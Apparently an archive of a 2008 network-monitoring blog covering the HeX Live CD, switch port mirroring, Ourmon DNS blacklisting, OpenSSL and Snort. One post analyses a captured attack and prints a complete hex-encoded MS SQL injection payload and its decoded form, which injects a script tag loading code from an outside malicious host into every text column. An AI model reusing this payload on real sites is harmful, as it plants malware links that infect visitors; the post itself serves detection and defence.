HeX 2.0 - The Bonobo Released

October 7th, 2008

Finally, after months of efforts, HeX development team has released HeX 2.0 Live CD, codename The Bonobo. This new release includes various applications update and additional features, which you can check it out at raWPacket website.

We have already synced all the ISO images to various mirror sites, so you are able to get it asap. Other than the 3 mirror sites in HeX 2.0 Release page, you can also download the Live CD from additional mirror sites below:

Malaysia: (thanks to Zamri)
http://archive.mmu.edu.my/hex/hex-i386-2.0.iso
http://archive.mmu.edu.my/hex/hex-i386-2.0.iso.md5
http://archive.mmu.edu.my/hex/hex-i386-2.0.iso.sha256

US: (thanks to enhanced)
https://secure.redsphereglobal.com/data/tools/security/live/HeX/hex-i386-2.0.iso
https://secure.redsphereglobal.com/data/tools/security/live/HeX/hex-i386-2.0.iso.md5
https://secure.redsphereglobal.com/data/tools/security/live/HeX/hex-i386-2.0.iso.sha256

Also don’t forget our new 2 very own HeX wallpapers, which can be downloaded here!

Join our mailing list http://groups.google.com/group/HeX-liveCD or IRC #rawpacket on Freenode if you wish to ask questions, contribute ideas, and have fun with HeX users.

HeX 2.0R Preview

October 6th, 2008

We are uploading HeX 2.0 Release image to mirror sites now, it is going to be released in another few hours. I won’t reveal much information here, for the time being, check out the preview images.

HeX 2.0 preview

By the way, if you have not updated your Wordpress installation to version 2.6.2, you should do it now. The hacking attempts are in the wild. This is the screen shot I had taken before I updated it weeks ago.

HeX 2.0 preview

Set 3com SuperStack 3 Switch 4500 Port Mirroring (SPAN)

May 24th, 2008

I do not have the intention to promote any products in this blog. This post is for me to record down the setup and it is pretty simple to do it in console or remote session.

<4500> system-view
[4500] interface Ethernet 1/0/1
[4500-Ethernet1/0/1] mirroring-port ?
  both      Mirror the inbound and outbound packets of the interface
  inbound   Mirror the inbound packets of the interface
  outbound  Mirror the outbound packets of the interface
[4500-Ethernet1/0/1] mirroring-port both
[4500-Ethernet1/0/1] quit
[4500] interface GigabitEthernet 1/0/27
[4500-GigabitEthernet1/0/27] monitor-port
[4500-GigabitEthernet1/0/27] quit
[4500] display mirror
 Monitor-port:
   GigabitEthernet1/0/27
 Mirroring-port:
   Ethernet1/0/1              both

Both inbound and outbound traffic will be mirrored to Gigabit Ethernet 1/0/27, and you are able to get your monitoring server to receive the traffic from this monitoring port.

That’s all for today.

Ourmon DNS Blacklist

April 26th, 2008

There is a new module in Ourmon, Topn DNS that shows the DNS traffic statistic. It comes with a DNS blacklist feature that needs to be configured. What I am going to show here are how to configure it (which is quite easy), and automate the update by using simple scripting with Shell, Perl.

First of all, this is the how to for DNS blacklist configuration:

The dns_include file config line allows a DNS name based blacklist to be configured into the ourmon probe. Any number of files may be given. The format of individual entries in the DNS blacklist is as follows:

lsass.exploited.org A

One entry should be given per line.

DNS query responses are unwrapped and if the question is found to match the DNS name in the blacklist, an ourmon event log message is generated.

That means, we need to create a blacklist file with the format above, and a list of black listed domains.

There is a project called DNS-BH, they create and maintain a listing of domains that are known to be used to propagate malware and spyware. So, with the free malware domains list, we are able to create a list and include it to the DNS blacklist.

I have created 2 scripts, 1 Perl script (domain-filter.pl) to grab the domains from the malware domains list and write them to a new file with format that Ourmon accepts, for example:

From
guti.my        unknown   guti.my/ourmon-dns-blacklist      2008apr
to
guti.my A

and 1 Shell (getbldns.sh) script to process the update, so that I am able to set it as cron job.

For those who are interested to try it out, you may download it at http://www.gutizz.com/scripts/ourmon-dns-blacklist.bz2.
md5sum: http://www.gutizz.com/scripts/ourmon-dns-blacklist.bz2.md5
There is a Readme file included the package as well. You need to edit the path of dns_include, and the path in the getbldns.sh shell script if your installation is in different directory.

This is the sample of the event log after blacklist has been configured, so you need to check why there were DNS requests to malware domains from these servers. (Click to enlarge the image.)
DNS Blacklist Event Log

There are 2 blacklist features in Ourmon as well, which are IRC blacklist and IP blacklist. Ourmon team has the IRC blacklist script written and put them in Ourmon src/scripts/, and I am still working on IP Blacklist which will fetch the black list IP from Harimau watchlist, the main problem is the support of netblock in the Ourmon IP Blacklist, which I will consider to remove those netblock addresses.

If you concern on the CPU and memory usage, here is the resource usage of Ourmon, with 20290 domains in DNS blacklist, and list of IP from EmergingThreat botcc rules in IRC blacklist loaded, and over 10k/s packets at peaks.

  PID USERNAME  THR PRI NICE   SIZE    RES STATE  C   TIME   WCPU COMMAND
59799   root          1   -58    0  48552K 28348K  bpf    4   3:44   2.49%  ourmon

If you have any other recommendation on DNS blacklist, please let me know.

Encoded SQL Injection

April 24th, 2008

There is nothing new when you read security advisories on SQL injection vulnerabilities found on certain products or applications. Most of the SQL injection that I have dealt with are plain SQL code injection, which allow me to easily search the sign of SQL injection attack in http log, unless the bad guys are using POST method inside a form or something else.

Today I have discovered a rare encoded SQL injection in one website’s http log that targeted on a MS SQL database. The bad guys had used the HTTP method GET, with encoded code in the SQL injection code. It was not difficult to detect it due to its long URL, and below is the code.

script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

This is the decoded version of the HEX code in the CAST function:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

It seems that there is a loop in the HEX code to update the js script after 30 characters in the field, disregard if there are more than 30 characters in the field, the SQL code will be injected the first time, and another after 30th character.

With encoded SQL code, the injection could easily bypass IDS and prevention rules. Unless you have set the IDS to alert if certain number characters in URL is passing through the IDS, or inspected HTTP log from time to time.

The js script redirects users to another page, 1.htm, and then try to download the exploits which try to exploit outdated Real Player, and a few MS remote code execution vulnerabilities such as MS06-014, MS07-004, MS07-018 and a few others. So, make sure your Windows and other third party applications are always updated to the latest version or have the latest patch applied.

Updates:
It seems that this domain has been listed in malwaredomains.com since 17th April.

OpenSSL creates CA serial file

April 12th, 2008

Sguil Logo I have encountered error below when I followed the Sguil OPENSSL.README to generate a certificate with a local CA for my Sguil 0.7.0 installation on FreeBSD 7.0 Release.

[root@nsm]# openssl x509 -req -in sguild.req -CA CA.pem -CAkey privkey.pem -CAserial file.sr1 -out sguild.pem
Signature ok
subject=/C=MY/ST=PG/O=Sguil/OU=Security/CN=servername
Getting CA Private Key
Enter pass phrase for privkey.pem:
file.sr1: No such file or directory
82464:error:02001002:system library:fopen:No such file or directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:352:fopen('file.sr1','r')
82464:error:20074002:BIO routines:FILE_CTRL:system lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:354:

OpenSSL Logo From the error message, it is obvious that I did not have the file.sr1 there. Since this was the first time I used the CA to sign the certificate, I would need to create serial key containing serial key. So I run -CAcreateserial as below:

[root@nsm]# openssl x509 -req -in sguild.req -CA CA.pem -CAkey privkey.pem -CAcreateserial -out sguild.pem

This created a new file (CA.srl) containing a serial number. The next time I have to use the -CAserial option when I create new certificate, and specify the path to this file name. The serial number will be incremented each time a new certificate is created.

Grace - XY plotting tool

April 5th, 2008

I have collected packets of a DDOS attack on one machine recently. It is just pure SYN attack to destination port 80, with over 5000 packets from different IP in 1 second. I try to create a graph with this packet by using Grace, a WYSIWYG 2D plotting tool for the X Window System and M*tif. Grace runs on practically any version of Unix-like OS. As well, it has been successfully ported to VMS, OS/2, and Win9*/NT/2000/XP.

First, I used Argus client - ra to show unidirectional RMON stat, with only source port and destination port selected, piped it to awk to make it readable data by Grace, and then convert the number for destination port. For example, X=0, Y=2224 (source port), then X=1, Y=80 (destination port):

[guti@nsm /]# ra -nr syn.argus -M rmon -s sport | awk '{ print 0,$1 }' | sed -e 's/0 80/1 80/g' > syn.dat

The output of syn.dat looks like this:

[guti@nsm /]# head -n 6 syn.dat
0 2224
1 80
0 2236
1 80
0 2242
1 80

Then use grace to plot it.

[guti@nsm /]# xmgrace6 syn.dat &

This is the graph of 23 seconds DDOS from source port to destination port.
DDOS Ports Grace Graph

If I use afterglow to show the connection from source to destination port, the graph looks like this.
DDOS Ports Afterglow Graph

This is the graph after I converted the source and destination IP to decimal, for example, from 192.168.1.123 to 3232235899.
DDOS IP Grace Graph

1 second source port to destination port graph, approximate 5000 SYN per second:
DDOS Ports Grace 1 Second Graph

From the port graph, I guess the DDOS was launched from 1 host with spoofed source IP and large bandwidth pipe, what do you think?

Ourmon and Snort 2.8.1 Released

April 4th, 2008

I noticed Ourmon 2.8.1 is quietly released on 21 March 2008. This bug-fix release fixes the bugs that I have reported previously, and my name is in the release note. The IP blacklist config takes 3 argument now, this helps when you have multiple blacklists, so you immediately tell which blacklist caused the message, but I am yet to test this feature.
For example in ourmon.conf:

blist_include "irc"  /home/mrourmon/etc/ipblacklist.txt

Snort LogoSnort, an open source network intrusion prevention and detection system, releases version 2.8.1. I got a 404 error while I was trying to download Snort 2.8.0.2 yesterday and noticed the file was not there anymore. Within few minutes, the Snort download page was refreshed and replaced with new v2.8.1 package. Coincidentally, the release version number is same with Ourmon latest bug-fix release. In v2.8.1, one of the new additions is the ability to read multiple pcaps from the command line, which I have usually done with Argus. Here is the sample:

[root@nsm /]# snort -dv -r irc1.pcap -r irc2.pcap | less
Running in packet dump mode

        --== Initializing Snort ==--
Initializing Output Plugins!
Verifying Preprocessor Configurations!
TCPDUMP file reading mode.
Reading network traffic from "irc1.pcap" file.
snaplen = 65535

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.8.1 (Build 28)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2008 Sourcefire Inc., et al.
           Using PCRE version: 7.6 2008-01-28

Not Using PCAP_FRAMES
07/11-08:00:32.312306 192.168.128.86:6667 -> 10.1.2.177:32793
TCP TTL:40 TOS:0x0 ID:51682 IpLen:20 DgmLen:91 DF
***AP*** Seq: 0xB368B2EB  Ack: 0xE79F2A5  Win: 0xB50  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2184210158 757152
3A 62 6D 77 30 37 21 34 76 71 74 71 74 34 40 38  :bmw07!4vqtqt4@8
32 2E 37 39 2E 38 37 2E 37 39 20 4A 4F 49 4E 20  2.79.87.79 JOIN
23 61 6C 62 61 0D 0A                                               #alba..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+